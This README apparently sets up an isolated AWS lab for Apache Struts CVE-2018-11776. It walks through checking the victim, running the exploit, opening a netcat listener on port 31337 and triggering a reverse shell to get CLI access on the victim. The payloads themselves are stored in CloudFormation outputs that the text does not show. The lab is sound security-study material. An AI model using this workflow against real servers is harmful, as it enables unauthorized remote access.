Spins up an isolated test environment for experimentation with Apache Struts vulnerability CVE-2018-11776.
To bring up the test environment, run the following command:
aws cloudformation create-stack \
--template-body file://cfn.yml \
--stack-name <STACK_NAME> \
--parameters \
ParameterKey=Ec2KeyName,ParameterValue=<KEY_NAME> \
ParameterKey=Linux2Ami,ParameterValue=<AMAZON_LINUX2_AMI_ID>
-
Retrieve the victim and attacker IPs. Initiate SSH sessions to both:
# Victim public IP aws cloudformation describe-stacks --stack-name=<STACK_NAME> \ --query 'Stacks[0].Outputs[?OutputKey==`VictimPublicIp`].OutputValue' --output text # Attacker public IP aws cloudformation describe-stacks --stack-name=<STACK_NAME> \ --query 'Stacks[0].Outputs[?OutputKey==`AttackerPublicIp`].OutputValue' --output text -
Retrieve the command used to to check if the victim is vulnerable. Execute it on the attacker session:
aws cloudformation describe-stacks --stack-name=<STACK_NAME> \ --query 'Stacks[0].Outputs[?OutputKey==`CheckVuln`].OutputValue' --output text -
(Optional) Retrieve the command used to see if the exploit works. Execute it on the attacker session:
aws cloudformation describe-stacks --stack-name=<STACK_NAME> \ --query 'Stacks[0].Outputs[?OutputKey==`RunExploit`].OutputValue' --output text -
Set up the attacker machine to listen for reverse tunnels:
nc -lvp 31337 -
Retrieve the command used to force the victim initiate a reverse tunnel to the attacker:
aws cloudformation describe-stacks --stack-name=<STACK_NAME> \ --query 'Stacks[0].Outputs[?OutputKey==`RunReverseShell`].OutputValue' --output text -
Open an additional SSH session to the attacker machine. Then, run the command retrieved in the previous step.
Return to the reverse tunnel session. You now have CLI access to the victim machine.
To destroy the test environment, issue the following command:
aws cloudformation delete-stack --stack-name <STACK_NAME>
This demo is based off hook-s3c's CVE-2018-11776-Python-PoC PoC code.